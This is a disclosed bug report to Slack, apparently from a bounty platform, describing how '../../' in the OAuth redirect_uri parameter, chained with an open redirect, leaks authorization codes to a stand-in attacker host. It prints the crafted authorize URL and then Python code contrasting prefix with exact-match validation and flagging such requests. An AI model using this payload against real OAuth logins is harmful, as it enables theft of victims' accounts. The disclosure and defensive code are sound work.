Broken Authentication (including Slack OAuth bugs)

Disclosed: 2014-08-30 07:19:16 By anandpingsafe To slack
Unknown
Vulnerability Details
Hi,

Hope you are doing well! Please have a look at the report below.

Description: OAuth framework flaw bypassing redirect_uri validation.

An attacker, to exploit this flaw, just needs to find an open redirection flaw in the site which is using Slack's OAuth for logins.

Impact: A malicious user can steal the "code" parameter value assigned by Slack OAuth and can hijack the victim's account by writing the value in a text file on his evilsite.com/a.php file.

Steps to reproduce:
1) Go to any web app which is using Slack's OAuth and click on Login with Slack.
2) You will be redirected to this URL:
   https://slack.com/oauth/authorize?client_id=...&scope=read,post&redirect_uri=https://www.givensite.com/../../redirect_url=https://www.evilsite.com/a.php%2Fcomplete
   Note: I am bypassing the redirect_uri validation by using ../../
   In the above URL, I have changed the value of redirect_uri to ../../redirect_url=https://www.evilsite.com/a.php and this should not happen.

The response will be:
   http://givensite.com/redirect_url=https:/www.evilsite.com/a.php/complete?code=AQCbhUg1FiEQf5TyTesMgjP8zq

And then in the final step the code value or access_token value will be written in my a.php file; the malicious guy will scrape it from the URL. So, then he can log in to the victim's account using the code value.

Please put proper validation on the redirect_uri parameter. The redirect_uri value should exactly match as defined in the application and the user should not be allowed to change it to subdirectories etc. This means if the redirect_uri value is https://www.google.com then it should take the value https://www.google.com, not https://www.google.com/a/x.

Looking forward to hearing from you.

Best regards,
Anand
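Added example (not part of the report, and not Slack's code): a Python check that contrasts a prefix-style redirect_uri match with the exact-match validation the reporter asks for, run against the traversal-shaped redirect_uri from the report, plus a small audit routine for authorize-request URLs taken from a log. The client ids, the registered callback URIs and the sample log URLs are constructed for the example.

```python
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed registrations for two hypothetical OAuth clients (not real Slack apps).
REGISTERED_REDIRECT_URIS = {
    "app_given": "https://www.givensite.com/oauth/callback",
    "app_bare_origin": "https://www.google.com",
}

# The redirect_uri shape described in the report (decoded form).
TRAVERSAL_URI = (
    "https://www.givensite.com/../../redirect_url="
    "https://www.evilsite.com/a.php/complete"
)


def prefix_match_check(client_id: str, redirect_uri: str) -> bool:
    """Weak validation: accept anything that starts with the registered origin.

    This is the class of check that lets a '../../' path through, because the
    presented string still begins with the trusted scheme and host.
    """
    registered = REGISTERED_REDIRECT_URIS.get(client_id)
    if registered is None:
        return False
    parts = urlsplit(registered)
    origin = f"{parts.scheme}://{parts.netloc}"
    return redirect_uri.startswith(origin)


def exact_match_check(client_id: str, redirect_uri: str) -> bool:
    """Hardened validation, as the report recommends: the presented value must
    equal the registered one byte for byte (no prefix or subdirectory tolerance)."""
    registered = REGISTERED_REDIRECT_URIS.get(client_id)
    return registered is not None and redirect_uri == registered


def registration_is_sane(uri: str) -> bool:
    """Checks to apply when a developer registers a redirect_uri, so the value an
    exact match later compares against cannot itself contain dot segments,
    carry a fragment, or use plain http."""
    parts = urlsplit(uri)
    if parts.scheme != "https" or not parts.netloc or parts.fragment:
        return False
    # A browser resolves '.' and '..' segments, so they must never be registered.
    return not any(seg in (".", "..") for seg in parts.path.split("/"))


def audit_authorize_url(url: str) -> Optional[str]:
    """Detection helper for logged /oauth/authorize requests: returns a reason
    when the redirect_uri carries a dot segment or an embedded URL, else None."""
    query = parse_qs(urlsplit(url).query)
    values = query.get("redirect_uri", [])
    if not values:
        return None
    path = urlsplit(values[0]).path
    if any(seg == ".." for seg in path.split("/")):
        return "dot-segment in redirect_uri path"
    if "://" in path:
        return "embedded URL inside redirect_uri path"
    return None


# Constructed authorize requests as they might appear in an access log.
SAMPLE_AUTHORIZE_URLS = [
    "https://slack.com/oauth/authorize?client_id=app_given&scope=read,post"
    "&redirect_uri=https://www.givensite.com/oauth/callback",
    "https://slack.com/oauth/authorize?client_id=app_given&scope=read,post"
    "&redirect_uri=https://www.givensite.com/../../redirect_url="
    "https://www.evilsite.com/a.php%2Fcomplete",
]


def audit_all(urls: List[str] = SAMPLE_AUTHORIZE_URLS) -> List[Tuple[str, str]]:
    """Return (url, reason) for every request the audit flags."""
    flagged = []
    for url in urls:
        reason = audit_authorize_url(url)
        if reason is not None:
            flagged.append((url, reason))
    return flagged


if __name__ == "__main__":
    for client, uri in [("app_given", TRAVERSAL_URI),
                        ("app_bare_origin", "https://www.google.com/a/x")]:
        print(client, uri)
        print("  prefix match accepts:", prefix_match_check(client, uri))
        print("  exact match accepts: ", exact_match_check(client, uri))
    for url, reason in audit_all():
        print("flagged:", reason, url)
```

The prefix check accepts both the traversal URI and the `/a/x` subdirectory case from the report, while the exact match rejects both; the sanity check at registration time is what keeps an exact match meaningful, since a registered value containing `..` would be resolved by the browser to a different location than the one compared against.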
Report Stats
  • Report ID: 2559
  • State: Closed
  • Substate: resolved
  • Upvotes: 4